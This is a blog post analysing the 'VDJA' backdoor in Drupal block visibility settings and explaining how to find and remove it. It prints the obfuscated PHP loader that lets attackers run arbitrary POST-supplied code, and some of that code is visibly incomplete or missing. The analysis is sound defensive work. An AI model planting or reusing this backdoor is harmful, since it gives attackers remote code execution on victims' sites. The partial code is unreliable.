The Drupal ‘VDJA’ Hack — And How To Deal With It

A malware exploit has been going around recently for Drupal, that secretly exposes everything on your computer… The exploit puts a function into your Drupal blocks that appears to do nothing, but it can be extremely dangerous. And if your website isn’t prepared, you may be exposed.

If you have a Drupal installation, you may want to take a look at your blocks right now.  What you’re looking for is this code:

<?php if(!function_exists('VDJA')){function VDJA($YdLmC){$uOez=array('h{jogmbuf',
$RzxD++) $uOez[$JvTXFl][$RzxD] = chr(ord($uOez[$JvTXFl][$RzxD])-1);
if($JvTXFl==1) $uOez[2]=$uOez[0]($uOez[1]($uOez[2]));} return $uOez[2];}
$qKdMG=$tOoyb("SylOSypNS0gvy08pzSrIBwA");$oeSFM=$qKdMG('',$tOoyb($qtKsJ));$oeSFM();}echo 1;

That code is likely to appear in one of the blocks in your theme, as a function called for showing the block on certain pages.

To check if you have it, go to Structure > Blocks, and for each block, click Configure.  At the bottom of the page, under Visibility Settings, you should see a section Show block on specific pages.  Underneath that, if the above code (or something like it) appears in the big textbox, you have the malware.

What does this malware do?

Let’s first expand the code:

<?php if (!function_exists('VDJA')) {
    function VDJA($YdLmC) {
        $uOez = array('h{jogmbuf', 'cbtf75`efdpef', $YdLmC);
        for ($JvTXFl = 0;$JvTXFl < 3;$JvTXFl++) {
            for ($RzxD = 0;$RzxD < strlen($uOez[$JvTXFl]);$RzxD++) 
                  $uOez[$JvTXFl][$RzxD] = chr(ord($uOez[$JvTXFl][$RzxD]) - 1);
            if ($JvTXFl == 1) $uOez[2] = $uOez[0]($uOez[1]($uOez[2]));
        return $uOez[2];
    $qtKsJ = "U1QEAj7urHTNrJKStFJN1YTAgJDQGI3U9IxMjTgtrRrHtPKkXHRhm7TKrFKbOgA=";
    $tOoyb = "VDJA";
    $qKdMG = $tOoyb("SylOSypNS0gvy08pzSrIBwA");
    $oeSFM = $qKdMG('', $tOoyb($qtKsJ));
echo 1; ?>

The code injects a PHP function into the page which allows a hacker to run any code on your site.  How does it do that?

Most of the code is simply just obfuscated PHP.  Essentially, the first part expands to a gziped, base64 encoded function.  If you trace it, you get the following:

$uOez (at the beginning) = Array
[0] => h{jogmbuf
[1] => cbtf75`efdpef
[2] => SylOSypNS0gvy08pzSrIBwA

The VJDA function returns base64_decode  of  the original string $qtKsJ.  That ends up calling create_function, and the function created is this:


So an attacker can now go on any page with this sidebar function (which is any page in the template essentially), and execute any PHP passed in via POST with the parameter dfgh.

How to remove it

The first thing you want to do is go into all of your blocks and empty out that code.  Make sure you do it for all of the templates.

If you have access to the database, you can search for anything by executing the following SQL:

SELECT pages FROM block WHERE pages like '%function_exists%';

You will then see any blocks with the function in them.

But that’s not enough

After you do that, you will need to make sure the hacker hasn’t made changes to any of your files or other database functions.  Look through your Drupal folders for anything out of the ordinary. Pay especially close attention to sites/default/files and your temp directory.

Make sure to change all of your passwords, and change your database password.  Then make sure you update Drupal and all of your plugins to the latest version.

Then, most importantly, make sure you protect your Drupal installation by installing a malware protection tool.

Angrily Comment

Copyright Siteturner 2023